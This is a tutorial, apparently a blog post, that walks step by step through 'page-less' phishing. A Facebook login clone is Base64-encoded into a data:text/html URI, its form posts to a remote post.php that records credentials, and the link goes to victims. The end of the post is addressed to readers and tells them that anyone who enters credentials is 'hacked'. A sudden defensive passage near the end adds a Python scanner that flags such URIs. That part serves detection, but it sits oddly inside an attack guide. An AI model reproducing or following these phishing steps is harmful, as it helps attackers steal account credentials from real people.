Hack with Base64 Encoding

Base64 encoding is nothing more than the conversion of binary values into an ASCII representation.

This allows phishing attacks to be launched without hosting the index.html file anywhere on a server. Hacking with Base64 encoding is the new and most famous way to get someone’s credentials easily.

Hence it is called a page-less phishing attack.

So how can a client be phished without a page?

First of all, recall the Facebook phishing attack, where the index.html page was hosted on the server. The client sent a request to the server after entering their username and password in the respective input fields. The server looked at the action attribute of the index.html page, which was set to post.php as shown below, and redirected the request to the post.php file.

action="post.php"

Base64 encoding is a page-less phishing attack, which means that the index.html page is not hosted on the internet. So when the index.html page is opened on the client side, it has no way of knowing the location of post.php.

So how can a client access a page that does not exist?

To overcome this, the action attribute in index.html is made to point to the full path of the post.php file hosted on the server, and the page itself is embedded in the URI.

This raises the question: how do you embed the page in a URI?

Before that, what is a URI? URI stands for uniform resource identifier, which is used to access resources in web browsers.

The general syntax of a data URI is:

data:[<MIME type>][;base64],<encoded data>

Here the encoded data is index.html, the MIME type is text/html and the encoding type is base64.

Encoding the data:

Hacking with Base64 encoding can be done in a few simple steps.

Step 1

Open the index.html file with any text editor, for example Notepad++, and copy all the content.

Step 2

Once the content is copied, open base64encode.org in your browser and look at the panel.

Paste the copied content of index.html and press encode. The result is the Base64-encoded data used in the URI.

When you press enter, the encoded data appears in the lower panel.

Step 3

Delete the index.html file. You don’t need it any more because its content is already encoded in Base64.

Step 4

Open a new tab in the browser and enter the following.

data:text/html;base64,encoded data

Here, encoded data is the output you copied from the base64encode.org site. Paste it into the link above in place of encoded data.

Step 5

This now opens the phishing page, for example a Facebook phishing page. When a client enters his or her username and password, you will get their credentials in the text file you specified in the post.php file.

All you have to do is give them the link from step 4; if they enter their credentials, they are hacked. In this way you have phished the user.
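From the defender's side, the structure described above is itself the detection point: a data:text/html;base64 URI whose decoded body contains a form with an absolute action URL. The following scanner is an added example, not code from the original post; the names scan and FormAudit and the host collector.example.invalid are assumptions made for illustration.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# data:[<mediatype>][;base64],<data> (RFC 2397); only HTML payloads are of interest
DATA_URI = re.compile(r"data:text/html(?:;[\w.+-]+=[^;,\s]*)*;base64,([A-Za-z0-9+/=%]+)", re.I)

class FormAudit(HTMLParser):
    """Collect form actions and note whether a password field is present."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def scan(text):
    """Return one finding per embedded HTML data: URI that contains a form."""
    findings = []
    for m in DATA_URI.finditer(text):
        raw = unquote(m.group(1))  # payload may be percent-encoded in transit
        try:
            html = base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid Base64, nothing to inspect
        audit = FormAudit()
        audit.feed(html)
        # An absolute action URL means the page-less form posts to a remote host
        remote = sorted({urlparse(x).netloc for x in audit.actions if urlparse(x).netloc})
        if audit.actions:
            findings.append({"offset": m.start(), "password_field": audit.has_password,
                             "posts_to": remote})
    return findings

# Constructed sample: a message body carrying a page-less login form (inert host).
_PAGE = '<form action="http://collector.example.invalid/post.php" method="post">' \
        '<input name="email"><input type="password" name="pass"></form>'
SAMPLE = "Please verify: data:text/html;base64," + base64.b64encode(_PAGE.encode()).decode() + " thanks"

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Run over mail bodies, chat messages or proxy logs, the posts_to list gives the collection host to block and investigate.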

For any queries, just have a look at Facebook phishing.

Your comments will be highly appreciated.